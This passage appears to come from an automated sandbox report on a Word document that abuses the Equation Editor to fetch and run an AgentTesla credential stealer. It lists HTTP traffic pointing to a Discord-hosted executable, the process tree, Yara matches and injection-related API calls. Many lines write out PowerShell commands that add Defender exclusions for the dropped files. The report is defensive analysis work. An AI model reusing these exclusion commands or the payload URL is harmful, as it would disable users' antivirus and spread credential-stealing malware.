                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0
                                                      May 27, 2021 21:42:24.263251066 CEST6INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 27 May 2021 19:42:24 GMT
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Cache-Control: max-age=3600
                                                      Expires: Thu, 27 May 2021 20:42:24 GMT
                                                      Location: https://cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      cf-request-id: 0a50f284f500002c016c8eb000000001
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6zVpDszxQSru3%2F%2Fgi6JYE5%2B%2FE%2Fu5y3lGj156NtaqWDTurgayB1BvGK1bFxXVNCvDibKfV8Qr%2BFAvxFwofepvVUWfwemhIK9vxqNRHIjc%2FYJD44zYYQNVGsksDiYo%2BAE%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 6561b9e7eef02c01-FRA
                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      HTTPS Packets

                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                      May 27, 2021 21:42:24.122585058 CEST162.159.130.233443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:46:39 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                      CN=Cloudflare Inc RSA CA-2, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:46:39 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                      Code Manipulations

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: WINWORD.EXE PID: 2432 Parent PID: 584

                                                      General

                                                      Start time:21:42:35
                                                      Start date:27/05/2021
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                      Imagebase:0x13fc60000
                                                      File size:1424032 bytes
                                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: EQNEDT32.EXE PID: 2676 Parent PID: 584

                                                      General

                                                      Start time:21:42:36
                                                      Start date:27/05/2021
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                      Imagebase:0x400000
                                                      File size:543304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: srt.exe PID: 2692 Parent PID: 2676

                                                      General

                                                      Start time:21:42:38
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.2179897228.00000000040F3000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2328 Parent PID: 2692

                                                      General

                                                      Start time:21:42:43
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 3028 Parent PID: 2692

                                                      General

                                                      Start time:21:42:43
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 3000 Parent PID: 2692

                                                      General

                                                      Start time:21:42:44
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2172 Parent PID: 2692

                                                      General

                                                      Start time:21:42:44
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2888 Parent PID: 2692

                                                      General

                                                      Start time:21:42:47
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2182891401.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 1664 Parent PID: 2692

                                                      General

                                                      Start time:21:42:48
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 3068 Parent PID: 2692

                                                      General

                                                      Start time:21:42:49
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2252 Parent PID: 2692

                                                      General

                                                      Start time:21:42:49
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 2612 Parent PID: 1388

                                                      General

                                                      Start time:21:42:53
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000013.00000002.2180537277.0000000004783000.00000004.00000001.sdmp, Author: Joe Security

                                                      Chronological Activities

                                                      Analysis Process: srt.exe PID: 1916 Parent PID: 2692

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2160 Parent PID: 2888

                                                      General

                                                      Start time:21:42:59
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 944 Parent PID: 2888

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 1572 Parent PID: 2888

                                                      General

                                                      Start time:21:43:00
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2028 Parent PID: 2888

                                                      General

                                                      Start time:21:43:01
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 3016 Parent PID: 2612

                                                      General

                                                      Start time:21:43:02
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: srt.exe PID: 2656 Parent PID: 2692

                                                      General

                                                      Start time:21:43:06
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\srt.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\user\AppData\Roaming\srt.exe
                                                      Imagebase:0x3c0000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2488 Parent PID: 2612

                                                      General

                                                      Start time:21:43:03
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2940 Parent PID: 2612

                                                      General

                                                      Start time:21:43:04
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 2976 Parent PID: 2612

                                                      General

                                                      Start time:21:43:04
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                                                      Imagebase:0x223e0000
                                                      File size:452608 bytes
                                                      MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      Chronological Activities

                                                      Analysis Process: svchost.exe PID: 2232 Parent PID: 1388

                                                      General

                                                      Start time:21:43:06
                                                      Start date:27/05/2021
                                                      Path:C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                                                      Imagebase:0x70000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000026.00000002.2211744541.0000000004053000.00000004.00000001.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML

                                                      Chronological Activities

                                                      Analysis Process: 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe PID: 3104 Parent PID: 2888

                                                      General

                                                      Start time:21:43:12
                                                      Start date:27/05/2021
                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                                                      Imagebase:0x1370000
                                                      File size:3777536 bytes
                                                      MD5 hash:9CDE4342C81458316E29CCBDA9B5A8E6
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000027.00000002.2165424688.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: srt.exe PID: 2692 Parent PID: 2676 srt.exeCOMMON

                                                        Executed Functions

                                                        Function 00360488, Relevance: .4, Instructions: 429COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 695294861279a137ef632b094f1715a7472e1da8bbf3f1fab9fa5ab1bced0346
                                                        • Instruction ID: cb07f5107d2fea1624730162ef5b8c913247568e0413e0492ba025f38895e979
                                                        • Opcode Fuzzy Hash: 695294861279a137ef632b094f1715a7472e1da8bbf3f1fab9fa5ab1bced0346
                                                        • Instruction Fuzzy Hash: D8E1D1347101254FDB09EBB4D8207AE76EBEBC8744F11882DD902AB399CFB4AD4697D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00360B09, Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ec9ebbf1df1dc094c48dd4f5a52e964e118ede9f94c17bb9def05b063182b91
                                                        • Instruction ID: aad611bb82d02b9f019b2e05f9283cb84089857ca9122bbf16dfe34b96aef273
                                                        • Opcode Fuzzy Hash: 9ec9ebbf1df1dc094c48dd4f5a52e964e118ede9f94c17bb9def05b063182b91
                                                        • Instruction Fuzzy Hash: D2F18534700204CFCB16AFB0E968B5D7BF2FB49305F15892DE506AF6A8DBB59981DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00360B70, Relevance: .3, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c4289e81a7da4449428fe66fd080fec66d4dcad2e3a0d7ee0ca75849e227c78
                                                        • Instruction ID: 876ccda4fcc503b46d4e89d3a1de34889967798b2cb743f677fd86f082ad8a41
                                                        • Opcode Fuzzy Hash: 3c4289e81a7da4449428fe66fd080fec66d4dcad2e3a0d7ee0ca75849e227c78
                                                        • Instruction Fuzzy Hash: 1CB19134600204DFCB1AABB0E959B5E7BF1FF49304F118929E506AF6A8DBB59990DB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00361888, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 003618A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 003618BA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: d78f5d04191862454971f975afdcede87c0cd7b49bb5e9567b61f1096cb07391
                                                        • Instruction ID: 6c2041c411e0c2c23d2e28f04074ed90924694809df0ec851c52dfb226843ff5
                                                        • Opcode Fuzzy Hash: d78f5d04191862454971f975afdcede87c0cd7b49bb5e9567b61f1096cb07391
                                                        • Instruction Fuzzy Hash: 31E09274E042089F8744EFB8E95456E7BF5BB48300B1045ADC809EB798EBB09E51CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00364B58, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00364D8E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: de17e0313b0acafa1f8663bcb922a3876b40258e8e24b5aee140c51dbbfe6e3d
                                                        • Instruction ID: a6d21c81062614ec8a3d9f6784a1d14e5d6c965308c14d259dff726751fe5812
                                                        • Opcode Fuzzy Hash: de17e0313b0acafa1f8663bcb922a3876b40258e8e24b5aee140c51dbbfe6e3d
                                                        • Instruction Fuzzy Hash: 27919B70D006199FDF11CFA8C8817EEBBB2FF48304F158569E808A7294DB759A81CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 003645B9, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00364640
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 06441397dc196518f47f33a4e782b4e70431964e8303b491c080d3443a920f08
                                                        • Instruction ID: 99c9025faff691687d784726c05f8d0dd98c97c9b077c1c196b5749af2bf3425
                                                        • Opcode Fuzzy Hash: 06441397dc196518f47f33a4e782b4e70431964e8303b491c080d3443a920f08
                                                        • Instruction Fuzzy Hash: 7E313975D003099FDB11CFA9D8447EEBBF5FF49314F10882AE619A7250D7789A44CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 003645C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00364640
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: e7c3cfe38adb294a029acb46edf9e2ab452787ca6f403fe84cf29f7150b8b003
                                                        • Instruction ID: 2e99bc75b0229e6cb96359496095327cb6a3b1f0a9e792462b2422924dba0716
                                                        • Opcode Fuzzy Hash: e7c3cfe38adb294a029acb46edf9e2ab452787ca6f403fe84cf29f7150b8b003
                                                        • Instruction Fuzzy Hash: F7213975D002099FCB10CFA9C884BEEFBF5FF48314F50882AE619A7250D7789940CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00364010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0036407E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
